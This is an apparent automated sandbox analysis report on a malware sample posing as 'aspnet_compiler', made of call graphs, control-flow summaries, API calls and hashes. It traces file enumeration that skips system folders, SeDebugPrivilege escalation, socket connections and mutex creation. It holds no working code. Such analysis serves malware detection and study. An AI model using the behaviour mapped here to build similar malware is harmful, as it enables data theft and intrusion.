calls 8941->8945 8941->8950 8947 402bab 2 API calls 8942->8947 8946 402bab 2 API calls 8943->8946 8944 402bab 2 API calls 8944->8941 8945->8950 8946->8937 8948 41213e 8947->8948 8949 402bab 2 API calls 8948->8949 8949->8950 8950->8927 8952 403d87 8951->8952 8953 403ea3 8952->8953 8954 405b6f 6 API calls 8952->8954 8955 405b6f 6 API calls 8953->8955 8956 403da3 8954->8956 8957 403eb9 8955->8957 8956->8953 8959 4031e5 4 API calls 8956->8959 8958 4031e5 4 API calls 8957->8958 8965 403f6f 8957->8965 8960 403ed3 FindFirstFileW 8958->8960 8961 403dbc FindFirstFileW 8959->8961 8977 403f8d 8960->8977 8981 403ee8 8960->8981 8972 403e9c 8961->8972 8982 403dd1 8961->8982 8962 402bab 2 API calls 8962->8965 8963 402bab 2 API calls 8963->8953 8964 4031e5 4 API calls 8966 403e84 FindNextFileW 8964->8966 8965->8941 8965->8944 8967 403e96 8966->8967 8966->8982 8991 403bef 8967->8991 8968 4031e5 4 API calls 8971 403f50 FindNextFileW 8968->8971 8970 405b6f 6 API calls 8970->8981 8974 403f87 8971->8974 8971->8981 8972->8963 8973 405b6f 6 API calls 8973->8982 8975 403bef 5 API calls 8974->8975 8975->8977 8976 403f75 8978 402bab 2 API calls 8976->8978 8977->8962 8980 403f7b 8978->8980 8979 403d74 15 API calls 8979->8982 8984 403bef 5 API calls 8980->8984 8981->8968 8981->8970 8981->8976 8985 402bab 2 API calls 8981->8985 8994 40fa23 8981->8994 8982->8964 8982->8973 8982->8979 8983 402bab 2 API calls 8982->8983 8986 403f63 8982->8986 8983->8982 8984->8965 8985->8981 8987 402bab 2 API calls 8986->8987 8988 403f69 8987->8988 8989 403bef 5 API calls 8988->8989 8989->8965 8992 4031e5 4 API calls 8991->8992 8993 403c01 FindClose 8992->8993 8993->8972 8995 40fa39 8994->8995 8996 410293 8995->8996 8997 405b6f 6 API calls 8995->8997 8996->8981 8998 40ffcc 8997->8998 8998->8996 8999 4040bb 12 API calls 8998->8999 9000 40ffeb 8999->9000 9001 41028c 9000->9001 9003 402b7c 2 API calls 9000->9003 9049 41027d 9000->9049 9002 402bab 2 API calls 9001->9002 9002->8996 9005 41001e 9003->9005 9004 403f9e 5 API calls 9004->9001 9006 40a423 4 API calls 9005->9006 9005->9049 9007 41004a 9006->9007 9008 4031e5 4 API calls 9007->9008 9009 41005c 9008->9009 9010 4031e5 4 API calls 9009->9010 9011 410079 9010->9011 9012 4031e5 4 API calls 9011->9012 9013 410096 9012->9013 9014 4031e5 4 API calls 9013->9014 9015 4100b0 9014->9015 9016 4031e5 4 API calls 9015->9016 9017 4100cd 9016->9017 9018 4031e5 4 API calls 9017->9018 9019 4100ea 9018->9019 9050 412516 9019->9050 9021 4100fd 9022 40642c 5 API calls 9021->9022 9023 41013e 9022->9023 9024 410142 9023->9024 9025 41019f 9023->9025 9026 40488c 5 API calls 9024->9026 9028 4031e5 4 API calls 9025->9028 9027 410151 9026->9027 9029 404866 4 API calls 9027->9029 9046 41019c 9027->9046 9039 4101bb 9028->9039 9033 410163 9029->9033 9030 40642c 5 API calls 9032 410201 9030->9032 9031 41022a 9035 413a58 13 API calls 9031->9035 9037 410205 9032->9037 9038 41022f 9032->9038 9034 406c4c 6 API calls 9033->9034 9047 41018e 9033->9047 9040 410178 9034->9040 9041 41026e 9035->9041 9036 403c40 5 API calls 9036->9046 9042 4126a7 7 API calls 9037->9042 9053 4125db 9038->9053 9044 4031e5 4 API calls 9039->9044 9045 406c4c 6 API calls 9040->9045 9048 402bab 2 API calls 9041->9048 9042->9031 9044->9046 9045->9047 9046->9030 9046->9031 9047->9036 9048->9049 9049->9004 9051 4031e5 4 API calls 9050->9051 9052 412539 9051->9052 9052->9021 9054 40488c 5 API calls 9053->9054 9055 4125ec 9054->9055 9056 4031e5 4 API calls 9055->9056 9062 41269f 9055->9062 9057 412609 9056->9057 9058 41268f 9057->9058 9059 4031e5 4 API calls 9057->9059 9060 403c40 5 API calls 9058->9060 9061 41262a 9059->9061 9060->9062 9063 412675 9061->9063 9070 4124f1 9061->9070 9062->9031 9064 4031e5 4 API calls 9063->9064 9064->9058 9067 412663 9069 4031e5 4 API calls 9067->9069 9068 4124f1 4 API calls 9068->9067 9069->9063 9071 4031e5 4 API calls 9070->9071 9072 412503 9071->9072 9072->9067 9072->9068 9259 4049dc 9260 4031e5 4 API calls 9259->9260 9261 4049ef 9260->9261 9916 40cddd 9917 405b6f 6 API calls 9916->9917 9918 40cdee 9917->9918 9919 413a58 13 API calls 9918->9919 9920 40ce06 9918->9920 9921 40ce00 9919->9921 9922 405b6f 6 API calls 9920->9922 9929 40ce59 9920->9929 9923 402bab 2 API calls 9921->9923 9924 40ce1c 9922->9924 9923->9920 9925 40ce52 9924->9925 9926 403d74 19 API calls 9924->9926 9924->9929 9927 402bab 2 API calls 9925->9927 9928 40ce45 9926->9928 9927->9929 9928->9925 9930 402bab 2 API calls 9928->9930 9930->9925 9262 40ecde 9263 412093 20 API calls 9262->9263 9264 40ecfd 9263->9264 9265 412093 20 API calls 9264->9265 9266 40ed0d 9265->9266 9270 40e8df 9271 412093 20 API calls 9270->9271 9272 40e8f8 9271->9272 9273 412093 20 API calls 9272->9273 9274 40e908 9273->9274 9281 404b22 9274->9281 9276 40e91c 9277 40e936 9276->9277 9280 40e93d 9276->9280 9288 40e944 9276->9288 9279 402bab 2 API calls 9277->9279 9279->9280 9282 402b7c 2 API calls 9281->9282 9284 404b33 9282->9284 9283 404b66 9283->9276 9284->9283 9297 4049b3 9284->9297 9287 402bab 2 API calls 9287->9283 9289 4056bf 2 API calls 9288->9289 9290 40e952 9289->9290 9291 4057df 13 API calls 9290->9291 9296 40e976 9290->9296 9292 40e966 9291->9292 9293 413aca 4 API calls 9292->9293 9294 40e970 9293->9294 9295 405695 2 API calls 9294->9295 9295->9296 9296->9277 9298 4031e5 4 API calls 9297->9298 9299 4049c6 9298->9299 9299->9283 9299->9287 9300 4139de 9309 413855 9300->9309 9302 4139f1 9303 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9302->9303 9304 4139f7 9303->9304 9305 413866 58 API calls 9304->9305 9306 413a2d 9305->9306 9307 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9306->9307 9308 413a34 9307->9308 9310 4031e5 4 API calls 9309->9310 9311 413864 9310->9311 9311->9311 9936 4116e7 9937 4117ba 9936->9937 9938 405b6f 6 API calls 9937->9938 9943 4117f1 9937->9943 9939 4117d0 9938->9939 9940 404cbf 8 API calls 9939->9940 9939->9943 9941 4117eb 9940->9941 9942 402bab 2 API calls 9941->9942 9942->9943 9331 4094e7 9332 404b22 6 API calls 9331->9332 9333 4094fe 9332->9333 9334 409554 9333->9334 9335 405b6f 6 API calls 9333->9335 9336 409514 9335->9336 9337 404b22 6 API calls 9336->9337 9344 40954d 9336->9344 9339 40952d 9337->9339 9338 402bab 2 API calls 9338->9334 9340 409544 9339->9340 9341 409408 15 API calls 9339->9341 9342 402bab 2 API calls 9340->9342 9343 40953e 9341->9343 9342->9344 9345 402bab 2 API calls 9343->9345 9344->9338 9345->9340 9354 4058ea 9355 4031e5 4 API calls 9354->9355 9356 4058fd StrStrA 9355->9356 9988 40d4ea 9989 404bee 6 API calls 9988->9989 9991 40d500 9989->9991 9990 40d5a0 9991->9990 9992 404bee 6 API calls 9991->9992 9993 40d529 9992->9993 9994 404bee 6 API calls 9993->9994 9995 40d537 9994->9995 9996 404bee 6 API calls 9995->9996 9997 40d546 9996->9997 9997->9990 9998 405872 4 API calls 9997->9998 9999 40d56d 9998->9999 10000 405872 4 API calls 9999->10000 10001 40d57c 10000->10001 10002 405872 4 API calls 10001->10002 10003 40d58e 10002->10003 10004 405872 4 API calls 10003->10004 10004->9990 10005 40a3ea 10006 40374e 6 API calls 10005->10006 10007 40a403 10006->10007 10008 40a419 10007->10008 10009 4059d8 4 API calls 10007->10009 10010 40a411 10009->10010 10011 402bab 2 API calls 10010->10011 10011->10008 9394 404df3 WSAStartup 9398 4091f6 9399 404b22 6 API calls 9398->9399 9400 40920b 9399->9400 9401 409222 9400->9401 9402 409408 15 API calls 9400->9402 9403 40921c 9402->9403 9404 402bab 2 API calls 9403->9404 9404->9401 10038 4117fe 10039 404c4e 6 API calls 10038->10039 10040 411888 10039->10040 10041 404c4e 6 API calls 10040->10041 10046 411925 10040->10046 10042 4118ab 10041->10042 10042->10046 10057 4119b3 10042->10057 10044 4118c5 10045 4119b3 4 API calls 10044->10045 10047 4118d0 10045->10047 10047->10046 10048 4056bf 2 API calls 10047->10048 10049 4118fd 10048->10049 10050 405872 4 API calls 10049->10050 10051 41190a 10050->10051 10052 405872 4 API calls 10051->10052 10053 411915 10052->10053 10054 413aca 4 API calls 10053->10054 10055 41191f 10054->10055 10056 405695 2 API calls 10055->10056 10056->10046 10058 4119c6 10057->10058 10060 4119bf 10057->10060 10059 4031e5 4 API calls 10058->10059 10059->10060 10060->10044 9408 40e880 9409 41219c 14 API calls 9408->9409 9410 40e88e 9409->9410 9411 41219c 14 API calls 9410->9411 9412 40e89c 9411->9412 10124 40e48a 10125 404bee 6 API calls 10124->10125 10126 40e4d0 10125->10126 10127 405872 4 API calls 10126->10127 10128 40e4f4 10126->10128 10127->10128 9509 410390 9510 404b22 6 API calls 9509->9510 9511 4103a5 9510->9511 9512 410409 9511->9512 9513 405b6f 6 API calls 9511->9513 9518 4103ba 9513->9518 9514 410402 9515 402bab 2 API calls 9514->9515 9515->9512 9516 4103fb 9517 402bab 2 API calls 9516->9517 9517->9514 9518->9514 9518->9516 9519 403d74 19 API calls 9518->9519 9520 4103ee 9519->9520 9520->9516 9521 402bab 2 API calls 9520->9521 9521->9516 10139 40ed96 10140 4040bb 12 API calls 10139->10140 10154 40edb0 10140->10154 10141 40ef90 10142 40ef87 10143 403f9e 5 API calls 10142->10143 10143->10141 10144 405ae9 6 API calls 10144->10154 10145 412269 6 API calls 10145->10154 10146 40ef61 10147 40ef6e 10146->10147 10150 402bab 2 API calls 10146->10150 10151 40ef7c 10147->10151 10152 402bab 2 API calls 10147->10152 10148 402bab GetProcessHeap HeapFree 10148->10154 10149 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10149->10154 10150->10147 10151->10142 10153 402bab 2 API calls 10151->10153 10152->10151 10153->10142 10154->10141 10154->10142 10154->10144 10154->10145 10154->10146 10154->10148 10154->10149 10155 40ef98 10156 404c4e 6 API calls 10155->10156 10157 40efb6 10156->10157 10158 40f02a 10157->10158 10170 40f054 10157->10170 10161 404bee 6 API calls 10162 40efda 10161->10162 10163 404bee 6 API calls 10162->10163 10164 40efe9 10163->10164 10164->10158 10165 405872 4 API calls 10164->10165 10166 40f008 10165->10166 10167 405872 4 API calls 10166->10167 10168 40f01a 10167->10168 10169 405872 4 API calls 10168->10169 10169->10158 10171 40f064 10170->10171 10172 402b7c 2 API calls 10171->10172 10174 40f072 10172->10174 10173 40efca 10173->10161 10174->10173 10176 405ecd 10174->10176 10177 4059b8 4 API calls 10176->10177 10178 405edf 10177->10178 10178->10174 9528 410c98 9529 41219c 14 API calls 9528->9529 9530 410ca8 9529->9530 9531 41219c 14 API calls 9530->9531 9532 410cb5 9531->9532 9533 412093 20 API calls 9532->9533 9534 410cc9 9533->9534 10248 41249c 10249 4056bf 2 API calls 10248->10249 10250 4124aa 10249->10250 10251 4057df 13 API calls 10250->10251 10256 4124ce 10250->10256 10252 4124be 10251->10252 10253 413aca 4 API calls 10252->10253 10254 4124c8 10253->10254 10255 405695 2 API calls 10254->10255 10255->10256 9538 40f49e 9539 40f4b6 13 API calls 9538->9539 9540 40f4a8 9539->9540 9541 40929e 9542 413b28 6 API calls 9541->9542 9543 4092a4 9542->9543 9544 405b6f 6 API calls 9543->9544 9545 4092af 9544->9545 9546 4092c5 9545->9546 9547 409408 15 API calls 9545->9547 9548 4092bf 9547->9548 9549 402bab 2 API calls 9548->9549 9549->9546 10275 407fa4 10276 407fb7 10275->10276 10277 402b7c 2 API calls 10276->10277 10279 407fee 10276->10279 10278 40800d 10277->10278 10278->10279 10280 4037be 4 API calls 10278->10280 10281 40803c 10280->10281 10282 402bab 2 API calls 10281->10282 10282->10279 9586 4090aa 9587 404b22 6 API calls 9586->9587 9588 4090c1 9587->9588 9589 409408 15 API calls 9588->9589 9595 4090d8 9588->9595 9591 4090d2 9589->9591 9590 404b22 6 API calls 9592 4090eb 9590->9592 9593 402bab 2 API calls 9591->9593 9594 408c4d 15 API calls 9592->9594 9598 409104 9592->9598 9593->9595 9596 4090fe 9594->9596 9595->9590 9597 402bab 2 API calls 9596->9597 9597->9598 9605 409cae 9620 404b79 9605->9620 9607 409cc5 9608 409d27 9607->9608 9610 405b6f 6 API calls 9607->9610 9611 409d2f 9607->9611 9609 402bab 2 API calls 9608->9609 9609->9611 9612 409cec 9610->9612 9612->9608 9613 404b79 6 API calls 9612->9613 9614 409d05 9613->9614 9615 409d1e 9614->9615 9616 408c4d 15 API calls 9614->9616 9617 402bab 2 API calls 9615->9617 9618 409d18 9616->9618 9617->9608 9619 402bab 2 API calls 9618->9619 9619->9615 9621 404b22 6 API calls 9620->9621 9622 404b8a 9621->9622 9622->9607 10342 411fb3 10343 405b6f 6 API calls 10342->10343 10345 412013 10343->10345 10344 412075 10345->10344 10346 41206a 10345->10346 10361 411a8d 10345->10361 10348 402bab 2 API calls 10346->10348 10348->10344 10350 4056bf 2 API calls 10351 41203d 10350->10351 10352 405872 4 API calls 10351->10352 10353 41204a 10352->10353 10354 413aca 4 API calls 10353->10354 10355 412054 10354->10355 10356 405695 2 API calls 10355->10356 10357 41205a 10356->10357 10358 413a58 13 API calls 10357->10358 10359 412064 10358->10359 10360 402bab 2 API calls 10359->10360 10360->10346 10362 402b7c 2 API calls 10361->10362 10364 411aa3 10362->10364 10363 411f05 10363->10346 10363->10350 10364->10363 10384 404ada 10364->10384 10367 404ada 4 API calls 10368 411cad 10367->10368 10369 411f0c 10368->10369 10370 411cc0 10368->10370 10371 402bab 2 API calls 10369->10371 10387 405eb6 10370->10387 10371->10363 10373 411d3c 10374 4031e5 4 API calls 10373->10374 10380 411d7b 10374->10380 10375 411ea6 10376 4031e5 4 API calls 10375->10376 10377 411eb5 10376->10377 10378 4031e5 4 API calls 10377->10378 10379 411ed6 10378->10379 10381 405eb6 4 API calls 10379->10381 10380->10375 10382 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10380->10382 10383 405eb6 4 API calls 10380->10383 10381->10363 10382->10380 10383->10380 10385 4031e5 4 API calls 10384->10385 10386 404afd 10385->10386 10386->10367 10388 405998 4 API calls 10387->10388 10389 405ec8 10388->10389 10389->10373 9652 40f6b8 9653 41219c 14 API calls 9652->9653 9654 40f6c7 9653->9654 9655 41219c 14 API calls 9654->9655 9656 40f6d5 9655->9656 9657 41219c 14 API calls 9656->9657 9658 40f6df 9657->9658 9677 40d6bd 9678 4056bf 2 API calls 9677->9678 9679 40d6c9 9678->9679 9690 404cbf 9679->9690 9682 404cbf 8 API calls 9683 40d6f4 9682->9683 9684 404cbf 8 API calls 9683->9684 9685 40d702 9684->9685 9686 413aca 4 API calls 9685->9686 9687 40d711 9686->9687 9688 405695 2 API calls 9687->9688 9689 40d71f 9688->9689 9691 402b7c 2 API calls 9690->9691 9692 404ccd 9691->9692 9693 404ddc 9692->9693 9694 404b8f 5 API calls 9692->9694 9693->9682 9695 404ce4 9694->9695 9696 404dd4 9695->9696 9698 402b7c 2 API calls 9695->9698 9697 402bab 2 API calls 9696->9697 9697->9693 9706 404d04 9698->9706 9699 404dcc 9700 404a39 5 API calls 9699->9700 9700->9696 9701 404dc6 9702 402bab 2 API calls 9701->9702 9702->9699 9703 402b7c 2 API calls 9703->9706 9704 404b8f 5 API calls 9704->9706 9705 404a39 5 API calls 9705->9706 9706->9699 9706->9701 9706->9703 9706->9704 9706->9705 9707 405b6f 6 API calls 9706->9707 9708 404cbf 8 API calls 9706->9708 9709 402bab GetProcessHeap HeapFree 9706->9709 9707->9706 9708->9706 9709->9706 9710 40f0bf 9711 4056bf 2 API calls 9710->9711 9712 40f0c9 9711->9712 9714 404cbf 8 API calls 9712->9714 9722 40f115 9712->9722 9713 41219c 14 API calls 9715 40f128 9713->9715 9716 40f0ed 9714->9716 9717 404cbf 8 API calls 9716->9717 9718 40f0fb 9717->9718 9719 413aca 4 API calls 9718->9719 9720 40f10a 9719->9720 9721 405695 2 API calls 9720->9721 9721->9722 9722->9713

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 155 403f97-403f9d 152->155 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 168 403e12-403e22 call 405d24 167->168 169 403de4-403df9 call 405eff 167->169 189 403e30-403e4c call 405b6f 168->189 190 403e24-403e2e 168->190 169->166 186 403dfb-403e10 call 405eff 169->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->168 189->166 204 403e4e-403e6f call 403d74 call 402bab 189->204 190->166 190->189 193->162 205 403f8d 196->205 197->159 202 403f75-403f85 call 402bab call 403bef 199->202 203 403f35-403f36 call 40fa23 199->203 202->155 209 403f39-403f40 call 402bab 203->209 204->166 217 403f63-403f73 call 402bab call 403bef 204->217 205->160 209->181 217->155
                    APIs
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNext
                    • String ID: %s\%s$%s\*$Program Files$Windows
                    • API String ID: 1690352074-2009209621
                    • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                    • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID: SeDebugPrivilege
                    • API String ID: 3615134276-2896544425
                    • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                    • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcess
                    • String ID:
                    • API String ID: 1357844191-0
                    • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                    • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                    APIs
                    • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                    • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 232 406201-406203 229->232 233 406208-406228 call 4060ac call 4031e5 229->233 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 232->235 233->230 233->232 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 260 406311-406317 call 402bab 257->260 261 406318-40631e 257->261 260->261 265 406320-406326 call 402bab 261->265 266 406327 261->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                    APIs
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                    • _wmemset.LIBCMT ref: 00406244
                    • _wmemset.LIBCMT ref: 00406261
                    • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wmemset$ErrorInformationLastToken
                    • String ID: IDA$IDA
                    • API String ID: 487585393-2020647798
                    • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                    • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                    • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                    • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 554 404ec7-404ec9 542->554 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 548 404ec0-404ec6 call 402bab 545->548 549 404ecb 545->549 546->545 548->554 553 404ecd-404ece 549->553 553->539 554->553
                    APIs
                    • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                    • socket.WS2_32(?,?,?), ref: 00404E7A
                    • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: freeaddrinfogetaddrinfosocket
                    • String ID:
                    • API String ID: 2479546573-0
                    • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                    • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                    • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                    • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateReadVirtual
                    • String ID: .tmp
                    • API String ID: 3585551309-2986845003
                    • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                    • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                    APIs
                    • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                    • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                    • GetLastError.KERNEL32 ref: 0041399E
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Error$CreateLastModeMutex
                    • String ID:
                    • API String ID: 3448925889-0
                    • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
